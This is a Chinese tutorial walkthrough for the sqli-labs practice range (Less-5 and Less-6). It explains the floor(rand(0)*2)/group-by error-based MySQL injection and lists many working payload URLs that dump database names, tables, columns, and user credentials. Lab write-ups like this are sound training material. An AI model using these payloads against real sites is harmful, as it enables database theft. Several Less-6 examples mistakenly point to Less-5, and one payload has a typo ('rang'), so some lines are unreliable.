sqli-labs靶场实现（四）【GET型的报错的注入（floor()、rand()、group by、count()）】（less-5~6、具体步骤+图文详解）

一）GET报错注入
  1）报错注入介绍
  2）GET单引号报错注入(less5)
  3）GET双引号报错注入(less6)
  4）sqlmap安全测试
二）补充知识
————————————————————————————————————————————————————————

一）GET报错注入

1）报错注入介绍

通过报错来显示出具体的信息，报错需要count(*)，rand()、group by，三者缺一不可。其中，对于报错注入几个常用函数进行讲解：

rand()————随机函数，返回0~1之间的某个值,它看起来每次获取的都是一个随机数，但其实它是通过一个
          固定的随机数的种子0并形成固定的伪随机序列；也就是说如果只是select rand() from 
          users; 那么每次产生的数都不同，但如果是select rand(0) from users;那么，每次产生
          的值就是为伪随机（产生的数据都是可预知的）。
          
那么又为什么floor报错注入利用的时候rand(0)*2为什么要乘以2呢?这就要配合floor 函数来解释了：

floor()————取整函数，返回小于等于a的最大整数，也就是取整；
floor(rand(0)*2）就是对rand(0)产生的随机序列乘以2后的结果，再进行取整后得到伪随机序列011011；

count()————聚合函数，返回查询对象的总数；
group by————分组语句，按照查询结果分组（相同的分为一组）；

报错的原理分析：

count()是计数函数，当count和group by合在一起用就会建立一个虚拟表,来数(shǔ)数(shù)。虚拟表如下所示（其中的key是主键，是不可以重复的）：

此时如果取数据库数据，那么就会先查看虚拟表是否存在此记录，不存在就插入新记录，存在则count(*)字段直接加1，虚表中写入第三条记录是时，产生了报错。此时floor(rand(0)*2)一共被计算了5次，最少3条数据才会报错的原因。（floor(rand(0)*2)为0时，不用计算直接丢弃）。

2）GET单引号报错注入

因为报错型注入并不像之前的联合查询用union select就会显示出信息，所以需要利用count()、floor()、rand()、group by 一起构造payload：

id=-1' union select 1,2,3 from (select count(*),concat((select concat(version() ,database(),user() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

解析：由外到内层层拆解，由内到外层层执行

1）union select 1,2,3 from ()a --+
2）select count(*),concat()x from information_schema.tables group by x
3）(),floor(rand(0)*2)
4）select concat() limit 0,1    ---根据不同需求只有此处的concat的内容在变换
5）version(),0x3a,0x3a,databasse(),0x3a,0x3a,user(),0x3a
 
注：对于 concat((select concat(version() ,database(),user() limit 0,1),floor(rand(0)*2))，内部concat是为了将版本~库~用户连接起来，外部concat是为了将内部concat的结果和floor()连接起来。

less5：

不确定闭合的方法就使用：http://192.168.67.140/sqli/Less-5/?id=1\

获取数据库信息：

构造url：

http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,0x7e,database(),0x7e,0x7e,user(),0x7e)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e,0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

获取所有库：

http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(schema_name,0x7e,0x7e)from information_schema.schemata  limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

获取指定库所有表：

http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e,0x7e)from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

获取指定库中指定表中的所有字段：

http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e,0x7e) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

dump出数据：

http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(username,0x7e,0x7e,password,0x7e,0x7e) from users limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

3）GET双引号报错注入

less6：

获取数据库信息：

http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,0x7e,database(),0x7e,0x7e,user(),0x7e)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-6/?id=-1" and (select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e,0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

获取所有库：

http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(schema_name,0x7e,0x7e)from information_schema.schemata  limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

http://192.168.67.140/sqli/Less-5/?id=-1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

获取指定库所有表：

http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e,0x7e)from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

获取指定库中指定表中的所有字段：

http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e,0x7e) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

dump出数据：

http://192.168.67.140/sqli/Less-5/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from users limit 0,1) ,floor(rang(0)*2))x from information_schema.tables group by x)a --+
或者：
http://192.168.67.140/sqli/Less-5/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

4）sqlmap安全测试

探测是否存在SQL注入：

获取数据库：

获取指定库中的表：

获取指定表中的字段：

dump数据：


二）扩补充知识

Mysql报错注入之floor(rand(0)*2)报错原理探究